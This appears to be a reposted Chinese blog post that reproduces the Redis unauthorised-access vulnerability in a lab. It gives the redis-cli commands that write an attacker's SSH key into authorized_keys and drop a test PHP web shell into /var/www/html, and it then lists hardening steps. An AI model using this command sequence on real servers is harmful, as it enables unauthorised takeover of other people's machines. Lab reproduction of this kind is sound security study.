2. 程式人生 > 實用技巧 >Redis未授權訪問漏洞分析

Redis未授權訪問漏洞分析

阿新 發佈:2020-07-14

Redis因配置不當和未授權訪問。導致無需認證就可以訪問到內部資料,可導致敏感資訊洩露,也可以通過config 命令,可以進行寫檔案操作。

一、復現環境:

redis v6.0.5

Redis Server:

Centos 7.5 Redis Server

redis.conf 檔案以下兩處進行修改

1、註釋掉 bind 127.0.0.1

2、protected-mode no

攻擊機:Centsos 7.5 Redis Client

二、復現過程:

1、下載Redisv6.0.5將壓縮包解壓後,在src目錄下有redis-server和redis-cli

修改redis.conf檔案:

註釋掉 bind 127.0.0.1

protected-mode no

2、 服務端啟動 redis server,攻擊機直接登陸到Redis Server

啟動 Redis Server : ./src/redis-server redis.conf

攻擊機連線server

./src/redis-cli -h 192.168.195.110

預設用6379埠登陸

無需認證即可登陸到Redis Server,並可執行命令。

4、通過ssh金鑰登陸Redis Server

攻擊機上ssh-keygen生成公鑰和私鑰,將公鑰寫入Redis伺服器,即可使用私鑰登陸

一路按回車即可,預設是 rsa 型別的金鑰

將公鑰內容複製

[root@centos7200 ~]# cat /root/.ssh/id_rsa.pub檢視後複製其內容

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwc/+k4e7fRsYKq6juYwzKvVj1oqPC++zKZ6GJqzpMDi9wh40UlUqD3TKrnvACCM5UZ4RNSuEJMjMytXHjeQqvg7W2tPecKne2HJ8iFE5A754d22k2MAQU/N0f2MPa4eCg0huKEo65bMh+VnxemuHLKyRe5n0q9BTCeXhDNjqkqbu2tBq77i9CducWtUwdSwQN0jLNH8TOSDeCPyWtJMfIQLEDvQIE9AHXAHM1QphBtU8+J6uJV3l7MW2CKd2j2xNQrc+AuVW8WmSBkLF1pUv0yJnBTdgL4xw6SWrn+XmmSWocV84EvYaRctI3QhQPJcz5DTD/7jG2Hn3fjt+mj/wB root@centos7-200

通過redis-cli登陸到server 後,輸入以下命令:

192.168.195.110:6379>config set dir /root/.ssh/將備份路徑設為/root/.ssh/

192.168.195.110:6379>config set dbfilename authorized_keys備份檔名改為authorized_keys

將複製的id_rsa.pub內容貼上進來

192.168.195.110:6379>set x "\n\n\nssh-

rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCwc/+k4e7fRsYKq6juYwzKvVj1oqPC++zKZ6GJqzpMDi9wh40UlUqD3TKrnvACCM5UZ4RNSuEJMjMytXHjeQqvg7W2tPecKne2HJ8iFE5A754d22k2MAQU/N0f2MPa4eCg0huKEo65bMh+VnxemuHLKyRe5n0q9BTCeXhDNjqkqbu2tBq77i9CducWtUwdSwQN0jLNH8TOSDeCPyWtJMfIQLEDvQIE9AHXAHM1QphBtU8+J6uJV3l7MW2CKd2j2xNQrc+AuVW8WmSBkLF1pUv0yJnBTdgL4xw6SWrn+XmmSWocV84EvYaRctI3QhQPJcz5DTD/7jG2Hn3fjt+mj/wBroot@centos7-200\n\n\n"

192.168.195.110:6379>save

攻擊機可以免密登陸到server

5、如果Server上開啟了web服務,Redis有寫許可權的話,可以寫webshell

開啟httpd服務:

登陸伺服器後執行以下命令:

192.168.195.110:6379>config set dir /var/www/html

192.168.195.110:6379>config set dbfilename webshell.php

192.168.195.110:6379>set x "<?php phpinfo(); ?>"

192.168.195.110:6379>save

訪問wehshell.php

三、防護措施

為Redis服務單獨建立user和home目錄,低許可權執行,並且配置禁止登陸

為Redis新增密碼驗證

我們可以通過修改redis.conf檔案來為Redis新增密碼驗證

requirepassmypassword

禁止外網訪問 Redis

修改redis.conf檔案來使得Redis服務只在當前主機可用

bind127.0.0.1

啟動保護模式

protected-mode yes

相關推薦

Redis授權訪問漏洞分析

Redis因配置不當和授權訪問。導致無需認證就可以訪問到內部資料,可導致敏感資訊洩露,也可以通過config 命令,可以進行寫檔案操作。

Docker環境復現利用Redis授權訪問漏洞 >> 批量掃描檢測利用

關於Redis Redis(Remote Dictionary Server ),即遠端字典服務,是一個開源的使用ANSI C語言編寫、支援網路、可基於記憶體亦可持久化的日誌型、Key-Value資料庫,並提供多種語言的API。從2010年3月15日起,Redis

redis授權訪問漏洞利用總結——linux篇

1、前言:   redis授權漏洞或弱口令一直是很有用的滲透突破口,最近遇到了redis相關的目標,因此做一個簡單的收集,也方便自己日後的回顧。

Redis授權訪問漏洞(Windows系統)

找msf的rb指令碼目錄,再拷貝下載的rb指令碼到msf指令碼目錄 進入msf後重新載入下

redis授權訪問漏洞復現

redis漏洞復現 本機需安裝redis服務redis-cli -h 192.168.7.134 如果開放ssh埠 靶機中執行 mkdir /root/.ssh命令,建立ssh公鑰存放目錄在攻擊機中生成ssh公鑰和私鑰,密碼設定為空ssh-keygen -t rsa進入ssh目錄 c

Redis 4.x/5.x 授權訪問漏洞

0x01 Redis是什麼? Redis是資料庫,一個高效能的key-value儲存系統,是使用ANSI C語言編寫的。

Redis 4.x/5.x 授權訪問漏洞+getShell漏洞復現

Redis 預設情況下,會繫結在 0.0.0.0:6379,如果沒有進行採用相關的策略,比如新增防火牆規則避免其他非信任來源 ip 訪問

Redis授權訪問配合SSH key檔案利用詳解

前言 Redis是一個開源的使用ANSI C語言編寫、支援網路、可基於記憶體亦可持久化的日誌型、Key-Value資料庫,並提供多種語言的API。

Redis授權訪問

Redis redis是一個key-value儲存系統, 是一個高效能的key-value資料庫 ,預設使用 6379 埠

redis授權訪問簡單總結

redis環境搭建 下載有漏洞redis版本 wget http://download.redis.io/releases/redis-3.2.11.tar.gz

Redis授權訪問利用

Redis介紹 Redis是一個開源的使用ANSI C語言編寫、支援網路、可基於記憶體亦可持久化的日誌型、 Key-Value資料庫。和Memcached類似,它支援儲存的value 型別相對更多,包括 string(字串)、list ( 連結串列)、 set(集

常見授權訪問漏洞總結

原創公眾號:Bypass 本文詳細地介紹了常見授權訪問漏洞及其利用,具體漏洞列表如下:

jenkins授權訪問漏洞復現

0x00 漏洞描述 授權訪問管理控制檯,可以通過指令碼命令列執行系統命令。通過該漏洞,可以後臺管理服務,通過指令碼命令列功能執行系統命令,如反彈shell,wget寫webshell檔案。

Zookeeper的授權訪問漏洞解決

這裡用的是使用者名稱密碼的方式,需用別的方式請參考下面地址附大佬連結:(有三種解決方法)https://www.cnblogs.com/ilovena/p/9484522.html首先介紹下znode的5種操作許可權:

JBOSS授權訪問漏洞復現

目錄1.JBOSS是什麼2.JBOSS授權訪問是什麼3.漏洞環境搭建4.漏洞復現進入控制檯進入應用部署頁面上馬5.jexboss工具安裝方法:

Elasticsearch授權訪問漏洞

漏洞描述 Elasticsearch是一款java編寫的企業級搜尋服務。越來越多的公司使用ELK作為日誌分析,啟動此服務預設會開放9200埠或者9300埠,可被非法操作資料

【Vulhub】Rsync授權訪問漏洞復現

Rsync未授權訪問 Rsync簡介 rsync,remotesynchronize顧名思意就知道它是一款實現遠端同步功能的軟體,它在同步檔案的同時,可以保持原來檔案的許可權、時間、軟硬連結等附加資訊。rsync是用 “rsync 演算法”提供了

Redis授權訪問+批量自動getshell指令碼

Redis授權訪問+批量自動getshell指令碼 漏洞產生條件 redis繫結在 0.0.0.0:6379,且沒有對登入IP做限制,直接暴露在公網。

Kafka自帶的Zookeeper授權訪問漏洞

技術標籤:基礎環境配置zookeeperkafka安全漏洞 漏洞描述 Zookeeper的預設開放埠是2181.Zookeeper安裝部署之後預設情況下不需要任何身份驗證。造成攻擊者可以遠端利用Zookeeper,通過伺服器收集敏感資訊或者在Zoo

redis授權訪問到獲取伺服器許可權

redis授權訪問到獲取伺服器許可權 好久沒寫部落格了,部落格園快荒蕪了。趕緊再寫一篇,算是一個關於自己學習的簡要的記錄把。